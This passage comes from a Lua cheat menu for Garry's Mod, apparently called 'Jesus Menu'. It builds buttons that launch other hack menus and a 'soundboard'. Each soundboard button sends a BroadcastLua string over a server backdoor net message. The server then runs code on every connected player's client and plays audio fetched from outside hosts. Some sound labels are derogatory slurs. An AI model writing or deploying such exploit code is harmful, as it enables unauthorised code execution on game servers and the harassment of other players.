  2559. RunConsoleCommand( "SmegHack_Menu" ) -- What happens when you press the button
  2560. end
  2561.  
  2562. local Macro = vgui.Create( "DButton" )
  2563. Macro:SetPos( 650, 160 )
  2564. Macro:SetParent(Targets)
  2565. Macro:SetText( "SmegHack" )
  2566. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2567. Macro:SetSize( 180, 30 )
  2568. Macro.Paint = function()
  2569. surface.SetDrawColor(30, 30, 30)
  2570. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2571. surface.SetDrawColor(15, 15, 15)
  2572. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2573. end
  2574. Macro.DoClick = function()
  2575. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "SmegHack lancé" )
  2576. SploitNotify("SmegHack lancé")
  2577. surface.PlaySound("buttons/blip1.wav")
  2578. RunConsoleCommand( "SmegHack_Menu" ) -- What happens when you press the button
  2579. end
  2580.  
  2581. local Macro = vgui.Create( "DButton" )
  2582. Macro:SetPos( 650, 160 )
  2583. Macro:SetParent(Controller)
  2584. Macro:SetText( "SmegHack" )
  2585. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2586. Macro:SetSize( 180, 30 )
  2587. Macro.Paint = function()
  2588. surface.SetDrawColor(30, 30, 30)
  2589. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2590. surface.SetDrawColor(15, 15, 15)
  2591. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2592. end
  2593. Macro.DoClick = function()
  2594. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "SmegHack lancé" )
  2595. SploitNotify("SmegHack lancé")
  2596. surface.PlaySound("buttons/blip1.wav")
  2597. RunConsoleCommand( "SmegHack_Menu" ) -- What happens when you press the button
  2598. end
  2599.  
  2600. local Macro = vgui.Create( "DButton" )
  2601. Macro:SetPos( 650, 190 )
  2602. Macro:SetParent(Misc)
  2603. Macro:SetText( "LokiDevs" )
  2604. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2605. Macro:SetSize( 180, 30 )
  2606. Macro.Paint = function()
  2607. surface.SetDrawColor(30, 30, 30)
  2608. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2609. surface.SetDrawColor(15, 15, 15)
  2610. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2611. end
  2612. Macro.DoClick = function()
  2613. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "LokiDevs lancé" )
  2614. SploitNotify("LokiDevs lancé")
  2615. surface.PlaySound("buttons/blip1.wav")
  2616. RunConsoleCommand( "LokiDevs_Menu" ) -- What happens when you press the button
  2617. end
  2618.  
  2619. local Macro = vgui.Create( "DButton" )
  2620. Macro:SetPos( 650, 190 )
  2621. Macro:SetParent(Targets)
  2622. Macro:SetText( "LokiDevs" )
  2623. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2624. Macro:SetSize( 180, 30 )
  2625. Macro.Paint = function()
  2626. surface.SetDrawColor(30, 30, 30)
  2627. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2628. surface.SetDrawColor(15, 15, 15)
  2629. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2630. end
  2631. Macro.DoClick = function()
  2632. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "LokiDevs lancé" )
  2633. SploitNotify("LokiDevs lancé")
  2634. surface.PlaySound("buttons/blip1.wav")
  2635. RunConsoleCommand( "LokiDevs_Menu" ) -- What happens when you press the button
  2636. end
  2637.  
  2638. local Macro = vgui.Create( "DButton" )
  2639. Macro:SetPos( 650, 190 )
  2640. Macro:SetParent(Controller)
  2641. Macro:SetText( "LokiDevs" )
  2642. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2643. Macro:SetSize( 180, 30 )
  2644. Macro.Paint = function()
  2645. surface.SetDrawColor(30, 30, 30)
  2646. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2647. surface.SetDrawColor(15, 15, 15)
  2648. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2649. end
  2650. Macro.DoClick = function()
  2651. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "LokiDevs lancé" )
  2652. SploitNotify("LokiDevs lancé")
  2653. surface.PlaySound("buttons/blip1.wav")
  2654. RunConsoleCommand( "LokiDevs_Menu" ) -- What happens when you press the button
  2655. end
  2656.  
  2657.  
  2658.  
  2659. ------------------------------------------------------------------------------
  2660. ----------------- SOUNDBOARD ET MUSIQUE
  2661. ------------------------------------------------------------------------------
  2662.  
  2663. -- MUSIQUE
  2664.  
  2665.  
  2666. local Macro = vgui.Create( "DButton" )
  2667. Macro:SetParent(Targets)
  2668. Macro:SetPos( 20, 30 )
  2669. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2670. Macro:SetSize( 110, 25 )
  2671. Macro:SetText( "Musique - Be Friend" )
  2672. Macro.Paint = function()
  2673. surface.SetDrawColor(29, 39, 55)
  2674. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2675. surface.SetDrawColor( 32, 80, 154 )
  2676. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2677. end
  2678. Macro.DoClick = function()
  2679. net.Start(netKey)
  2680. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/whcant.mp3\", \"mono\", function()end )]])")
  2681. net.WriteBit (1)
  2682. net.SendToServer()
  2683. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Be Friend activé" )
  2684. SploitNotify("Musique - Be Friend ")
  2685. surface.PlaySound("buttons/blip1.wav")
  2686. end
  2687.  
  2688.  
  2689. local Macro = vgui.Create( "DButton" )
  2690. Macro:SetParent(Targets)
  2691. Macro:SetPos( 20, 60 )
  2692. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2693. Macro:SetSize( 110, 25 )
  2694. Macro:SetText( "Musique - Salut c'est cool" )
  2695. Macro.Paint = function()
  2696. surface.SetDrawColor(29, 39, 55)
  2697. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2698. surface.SetDrawColor( 32, 80, 154 )
  2699. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2700. end
  2701. Macro.DoClick = function()
  2702. net.Start(netKey)
  2703. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/salutccool.mp3\", \"mono\", function()end )]])")
  2704. net.WriteBit (1)
  2705. net.SendToServer()
  2706. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Salut c'est cool activé" )
  2707. SploitNotify("Musique - Salut c'est cool ")
  2708. surface.PlaySound("buttons/blip1.wav")
  2709. end
  2710.  
  2711. local Macro = vgui.Create( "DButton" )
  2712. Macro:SetParent(Targets)
  2713. Macro:SetPos( 20, 90 )
  2714. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2715. Macro:SetSize( 110, 25 )
  2716. Macro:SetText( "Musique - Tenir ta main" )
  2717. Macro.Paint = function()
  2718. surface.SetDrawColor(29, 39, 55)
  2719. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2720. surface.SetDrawColor( 32, 80, 154 )
  2721. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2722. end
  2723. Macro.DoClick = function()
  2724. net.Start(netKey)
  2725. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Gr%C3%A9goire.mp3\", \"mono\", function()end )]])")
  2726. net.WriteBit(1)
  2727. net.SendToServer()
  2728. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Tenir ta main activé" )
  2729. SploitNotify("Musique - Tenir ta main ")
  2730. surface.PlaySound("buttons/blip1.wav")
  2731. end
  2732.  
  2733. local Macro = vgui.Create( "DButton" )
  2734. Macro:SetParent(Targets)
  2735. Macro:SetPos( 20, 120 )
  2736. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2737. Macro:SetSize( 110, 25 )
  2738. Macro:SetText( "Musique - Wesh Alors [JUL]" )
  2739. Macro.Paint = function()
  2740. surface.SetDrawColor(29, 39, 55)
  2741. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2742. surface.SetDrawColor( 32, 80, 154 )
  2743. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2744. end
  2745.  
  2746. Macro.DoClick = function()
  2747. net.Start(netKey)
  2748. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/wesh.mp3\", \"mono\", function()end )]])")
  2749. net.WriteBit (1)
  2750. net.SendToServer()
  2751. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Wesh Alors [JUL] activé" )
  2752. SploitNotify("Musique - Jul WESH ALORS ")
  2753. surface.PlaySound("buttons/blip1.wav")
  2754. end
  2755.  
  2756. local Macro = vgui.Create( "DButton" )
  2757. Macro:SetParent(Targets)
  2758. Macro:SetPos( 20, 150 )
  2759. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2760. Macro:SetSize( 110, 25 )
  2761. Macro:SetText( "Musique - MondotekAlive" )
  2762. Macro.Paint = function()
  2763. surface.SetDrawColor(29, 39, 55)
  2764. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2765. surface.SetDrawColor( 32, 80, 154 )
  2766. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2767. end
  2768. Macro.DoClick = function()
  2769. net.Start(netKey)
  2770. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Mondotek%20-%20Alive%20(Ph%20Electro%20Remix).mp3\", \"mono\", function()end )]])")
  2771. net.WriteBit (1)
  2772. net.SendToServer()
  2773. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - MondotekAlive activé" )
  2774. SploitNotify("Musique - MondotekAlive ")
  2775. surface.PlaySound("buttons/blip1.wav")
  2776. end
  2777.  
  2778. local Macro = vgui.Create( "DButton" )
  2779. Macro:SetParent(Targets)
  2780. Macro:SetPos( 20, 180 )
  2781. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2782. Macro:SetSize( 110, 25 )
  2783. Macro:SetText( "Musique - Un éléphant " )
  2784. Macro.Paint = function()
  2785. surface.SetDrawColor(29, 39, 55)
  2786. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2787. surface.SetDrawColor( 32, 80, 154 )
  2788. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2789. end
  2790. Macro.DoClick = function()
  2791. net.Start(netKey)
  2792. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/Un%20%C3%A9l%C3%A9phant%20qui%20se%20balan%C3%A7ait.mp3\", \"mono\", function()end )]])")
  2793. net.WriteBit (1)
  2794. net.SendToServer()
  2795. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Un éléphant qui se balancait activé !" )
  2796. SploitNotify("Musique - Un éléphant qui se balancait ")
  2797. surface.PlaySound("buttons/blip1.wav")
  2798. end
  2799.  
  2800. local Macro = vgui.Create( "DButton" )
  2801. Macro:SetParent(Targets)
  2802. Macro:SetPos( 20, 210 )
  2803. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2804. Macro:SetSize( 110, 25 )
  2805. Macro:SetText( "Musique - Chuis bo" )
  2806. Macro.Paint = function()
  2807. surface.SetDrawColor(29, 39, 55)
  2808. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2809. surface.SetDrawColor( 32, 80, 154 )
  2810. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2811. end
  2812. Macro.DoClick = function()
  2813. net.Start(netKey)
  2814. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/chuis%20bo.mp3\", \"mono\", function()end )]])")
  2815. net.WriteBit (1)
  2816. net.SendToServer()
  2817. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Chuis bo" )
  2818. SploitNotify("Musique - Chuis bo ")
  2819. surface.PlaySound("buttons/blip1.wav")
  2820. end
  2821.  
  2822. local Macro = vgui.Create( "DButton" )
  2823. Macro:SetParent(Targets)
  2824. Macro:SetPos( 20, 240 )
  2825. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2826. Macro:SetSize( 110, 25 )
  2827. Macro:SetText( "Musique - Pouet pouet" )
  2828. Macro.Paint = function()
  2829. surface.SetDrawColor(29, 39, 55)
  2830. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2831. surface.SetDrawColor( 32, 80, 154 )
  2832. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2833. end
  2834. Macro.DoClick = function()
  2835. net.Start(netKey)
  2836. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/R%C3%A9mi%20-%20La%20Totomobile%20-%20clip%20officiel.mp3\", \"mono\", function()end )]])")
  2837. net.WriteBit (1)
  2838. net.SendToServer()
  2839. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Pouet Pouet" )
  2840. SploitNotify("Musique - Pouet pouet ")
  2841. surface.PlaySound("buttons/blip1.wav")
  2842. end
  2843.  
  2844. local Macro = vgui.Create( "DButton" )
  2845. Macro:SetParent(Targets)
  2846. Macro:SetPos( 20, 270 )
  2847. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2848. Macro:SetSize( 110, 25 )
  2849. Macro:SetText( "Musique - Pirouette" )
  2850. Macro.Paint = function()
  2851. surface.SetDrawColor(29, 39, 55)
  2852. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2853. surface.SetDrawColor( 32, 80, 154 )
  2854. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2855. end
  2856. Macro.DoClick = function()
  2857. net.Start(netKey)
  2858. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/Pirouette,%20cacahu%C3%A8te%20-%20Il%20%C3%A9tait%20un%20petit%20homme.mp3\", \"mono\", function()end )]])")
  2859. net.WriteBit (1)
  2860. net.SendToServer()
  2861. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Pirouette" )
  2862. SploitNotify("Musique - Pirouette ")
  2863. surface.PlaySound("buttons/blip1.wav")
  2864. end
  2865.  
  2866. local Macro = vgui.Create( "DButton" )
  2867. Macro:SetParent(Targets)
  2868. Macro:SetPos( 20, 300 )
  2869. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2870. Macro:SetSize( 110, 25 )
  2871. Macro:SetText( "Musique - Pomme api" )
  2872. Macro.Paint = function()
  2873. surface.SetDrawColor(29, 39, 55)
  2874. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2875. surface.SetDrawColor( 32, 80, 154 )
  2876. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2877. end
  2878. Macro.DoClick = function()
  2879. net.Start(netKey)
  2880. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/Pomme%20de%20reinette%20et%20pomme%20d'api.mp3\", \"mono\", function()end )]])")
  2881. net.WriteBit (1)
  2882. net.SendToServer()
  2883. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Pomme api" )
  2884. SploitNotify("Musique - Pomme api ")
  2885. surface.PlaySound("buttons/blip1.wav")
  2886. end
  2887.  
  2888. local Macro = vgui.Create( "DButton" )
  2889. Macro:SetParent(Targets)
  2890. Macro:SetPos( 20, 330 )
  2891. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2892. Macro:SetSize( 110, 25 )
  2893. Macro:SetText( "Musique - Gipsy" )
  2894. Macro.Paint = function()
  2895. surface.SetDrawColor(29, 39, 55)
  2896. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2897. surface.SetDrawColor( 32, 80, 154 )
  2898. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2899. end
  2900. Macro.DoClick = function()
  2901. net.Start(netKey)
  2902. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/L'araign%C3%A9e%20Gipsy.mp3\", \"mono\", function()end )]])")
  2903. net.WriteBit (1)
  2904. net.SendToServer()
  2905. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Gipsy" )
  2906. SploitNotify("Musique - Gipsy ")
  2907. surface.PlaySound("buttons/blip1.wav")
  2908. end
  2909. ----SOUNDBOARD
  2910.  
  2911.  
  2912. local Macro = vgui.Create( "DButton" )
  2913. Macro:SetParent(Targets)
  2914. Macro:SetPos( 140, 30 )
  2915. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2916. Macro:SetSize( 110, 25 )
  2917. Macro:SetText( "Soundboard - Karim" )
  2918. Macro.Paint = function()
  2919. surface.SetDrawColor(29, 39, 55)
  2920. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2921. surface.SetDrawColor( 32, 80, 154 )
  2922. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2923. end
  2924. Macro.DoClick = function()
  2925. net.Start(netKey)
  2926. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/KARIM.mp3\", \"mono\", function()end )]])")
  2927. net.WriteBit (1)
  2928. net.SendToServer()
  2929. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Musique - Karim activé" )
  2930. SploitNotify("Musique - KARIM")
  2931. surface.PlaySound("buttons/blip1.wav")
  2932. end
  2933.  
  2934. local Macro = vgui.Create( "DButton" )
  2935. Macro:SetParent(Targets)
  2936. Macro:SetPos( 140, 60 )
  2937. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2938. Macro:SetSize( 110, 25 )
  2939. Macro:SetText( "Soundboard - AHHHHHH" )
  2940. Macro.Paint = function()
  2941. surface.SetDrawColor(29, 39, 55)
  2942. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2943. surface.SetDrawColor( 32, 80, 154 )
  2944. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2945. end
  2946. Macro.DoClick = function()
  2947. net.Start(netKey)
  2948. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/AHHHHHHHHHHHHHHHHH.wav\", \"mono\", function()end )]])")
  2949. net.WriteBit (1)
  2950. net.SendToServer()
  2951. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - AHHHHHH activé" )
  2952. SploitNotify("Soundboard - AHHHHHH ")
  2953. surface.PlaySound("buttons/blip1.wav")
  2954. end
  2955.  
  2956.  
  2957. local Macro = vgui.Create( "DButton" )
  2958. Macro:SetParent(Targets)
  2959. Macro:SetPos( 140, 90 )
  2960. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2961. Macro:SetSize( 110, 25 )
  2962. Macro:SetText( "Soundboard - Code avec le cul" )
  2963. Macro.Paint = function()
  2964. surface.SetDrawColor(29, 39, 55)
  2965. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2966. surface.SetDrawColor( 32, 80, 154 )
  2967. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2968. end
  2969. Macro.DoClick = function()
  2970. net.Start(netKey)
  2971. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristofficiel.fr/gmod/upload/code.mp3\", \"mono\", function()end )]])")
  2972. net.WriteBit (1)
  2973. net.SendToServer()
  2974. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Code avec le cul activé" )
  2975. SploitNotify("Soundboard - JE CODE AVEC LE CUL ")
  2976. surface.PlaySound("buttons/blip1.wav")
  2977. end
  2978.  
  2979. ----TK78
  2980. local Macro = vgui.Create( "DButton" )
  2981. Macro:SetParent(Targets)
  2982. Macro:SetPos( 260, 30 )
  2983. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2984. Macro:SetSize( 110, 25 )
  2985. Macro:SetText( "Soundboard - WALLAH" )
  2986. Macro.Paint = function()
  2987. surface.SetDrawColor(29, 39, 55)
  2988. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2989. surface.SetDrawColor( 32, 80, 154 )
  2990. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2991. end
  2992. Macro.DoClick = function()
  2993. net.Start(netKey)
  2994. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Wallah.mp3\", \"mono\", function()end )]])")
  2995. net.WriteBit (1)
  2996. net.SendToServer()
  2997. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  2998. SploitNotify("Soundboard")
  2999. surface.PlaySound("buttons/blip1.wav")
  3000. end
  3001.  
  3002. local Macro = vgui.Create( "DButton" )
  3003. Macro:SetParent(Targets)
  3004. Macro:SetPos( 260, 60 )
  3005. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3006. Macro:SetSize( 110, 25 )
  3007. Macro:SetText( "Soundboard - zehmah" )
  3008. Macro.Paint = function()
  3009. surface.SetDrawColor(29, 39, 55)
  3010. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3011. surface.SetDrawColor( 32, 80, 154 )
  3012. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3013. end
  3014. Macro.DoClick = function()
  3015. net.Start(netKey)
  3016. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/Zehma.mp3\", \"mono\", function()end )]])")
  3017. net.WriteBit (1)
  3018. net.SendToServer()
  3019. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3020. SploitNotify("Soundboard")
  3021. surface.PlaySound("buttons/blip1.wav")
  3022. end
  3023.  
  3024. local Macro = vgui.Create( "DButton" )
  3025. Macro:SetParent(Targets)
  3026. Macro:SetPos( 260, 90 )
  3027. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3028. Macro:SetSize( 110, 25 )
  3029. Macro:SetText( "Soundboard - mongole" )
  3030. Macro.Paint = function()
  3031. surface.SetDrawColor(29, 39, 55)
  3032. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3033. surface.SetDrawColor( 32, 80, 154 )
  3034. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3035. end
  3036. Macro.DoClick = function()
  3037. net.Start(netKey)
  3038. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/bruit%20de%20gogole.mp3\", \"mono\", function()end )]])")
  3039. net.WriteBit (1)
  3040. net.SendToServer()
  3041. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3042. SploitNotify("Soundboard")
  3043. surface.PlaySound("buttons/blip1.wav")
  3044. end
  3045.  
  3046. local Macro = vgui.Create( "DButton" )
  3047. Macro:SetParent(Targets)
  3048. Macro:SetPos( 260, 120 )
  3049. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3050. Macro:SetSize( 110, 25 )
  3051. Macro:SetText( "Soundboard - mon reup" )
  3052. Macro.Paint = function()
  3053. surface.SetDrawColor(29, 39, 55)
  3054. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3055. surface.SetDrawColor( 32, 80, 154 )
  3056. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3057. end
  3058. Macro.DoClick = function()
  3059. net.Start(netKey)
  3060. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/mon%20rep%20se%20pose%20des%20questions.mp3\", \"mono\", function()end )]])")
  3061. net.WriteBit (1)
  3062. net.SendToServer()
  3063. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3064. SploitNotify("Soundboard")
  3065. surface.PlaySound("buttons/blip1.wav")
  3066. end
  3067.  
  3068. local Macro = vgui.Create( "DButton" )
  3069. Macro:SetParent(Targets)
  3070. Macro:SetPos( 260, 150 )
  3071. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3072. Macro:SetSize( 110, 25 )
  3073. Macro:SetText( "Soundboard - musique 1" )
  3074. Macro.Paint = function()
  3075. surface.SetDrawColor(29, 39, 55)
  3076. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3077. surface.SetDrawColor( 32, 80, 154 )
  3078. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3079. end
  3080. Macro.DoClick = function()
  3081. net.Start(netKey)
  3082. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/musique%201.mp3\", \"mono\", function()end )]])")
  3083. net.WriteBit (1)
  3084. net.SendToServer()
  3085. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3086. SploitNotify("Soundboard")
  3087. surface.PlaySound("buttons/blip1.wav")
  3088. end
  3089.  
  3090. local Macro = vgui.Create( "DButton" )
  3091. Macro:SetParent(Targets)
  3092. Macro:SetPos( 260, 180 )
  3093. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3094. Macro:SetSize( 110, 25 )
  3095. Macro:SetText( "Soundboard - musique 2" )
  3096. Macro.Paint = function()
  3097. surface.SetDrawColor(29, 39, 55)
  3098. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3099. surface.SetDrawColor( 32, 80, 154 )
  3100. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3101. end
  3102. Macro.DoClick = function()
  3103. net.Start(netKey)
  3104. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/musique%202.mp3\", \"mono\", function()end )]])")
  3105. net.WriteBit (1)
  3106. net.SendToServer()
  3107. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3108. SploitNotify("Soundboard")
  3109. surface.PlaySound("buttons/blip1.wav")
  3110. end
  3111.  
  3112. local Macro = vgui.Create( "DButton" )
  3113. Macro:SetParent(Targets)
  3114. Macro:SetPos( 260, 210 )
  3115. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3116. Macro:SetSize( 110, 25 )
  3117. Macro:SetText( "Soundboard - Sa marche pas" )
  3118. Macro.Paint = function()
  3119. surface.SetDrawColor(29, 39, 55)
  3120. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3121. surface.SetDrawColor( 32, 80, 154 )
  3122. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3123. end
  3124. Macro.DoClick = function()
  3125. net.Start(netKey)
  3126. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/%C3%A7a%20Marche%20Pas.mp3\", \"mono\", function()end )]])")
  3127. net.WriteBit (1)
  3128. net.SendToServer()
  3129. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard - Sa marche pas" )
  3130. SploitNotify("Soundboard - Sa marche pas ")
  3131. surface.PlaySound("buttons/blip1.wav")
  3132. end
  3133.  
  3134. local Macro = vgui.Create( "DButton" )
  3135. Macro:SetParent(Targets)
  3136. Macro:SetPos( 260, 240 )
  3137. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3138. Macro:SetSize( 110, 25 )
  3139. Macro:SetText( "Soundboard - Anglais" )
  3140. Macro.Paint = function()
